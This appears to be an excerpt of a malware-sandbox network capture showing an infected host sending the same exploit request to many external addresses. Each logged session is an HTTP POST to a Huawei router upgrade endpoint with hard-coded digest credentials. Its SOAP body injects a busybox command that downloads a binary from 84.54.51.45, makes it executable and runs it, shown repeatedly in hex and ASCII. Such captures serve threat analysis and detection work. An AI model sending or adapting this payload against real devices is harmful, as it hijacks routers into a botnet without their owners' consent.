68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            46192.168.2.153278641.80.116.21137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:04.732363939 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            47192.168.2.154975841.7.171.4137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:04.732383966 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            48192.168.2.153750041.175.9.7537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:04.732454062 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            49192.168.2.155007041.169.133.19737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:04.732454062 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            50192.168.2.153513641.246.114.9437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:04.732472897 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            51192.168.2.155075041.209.233.8037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:04.732501984 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            52192.168.2.154346841.11.87.437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:04.732516050 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            53192.168.2.155587241.134.102.24337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:04.732547998 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            54192.168.2.154811641.4.171.16937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:04.732572079 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            55192.168.2.154322041.179.119.17937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:04.732604980 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            56192.168.2.155613441.131.2.10537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:04.732631922 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
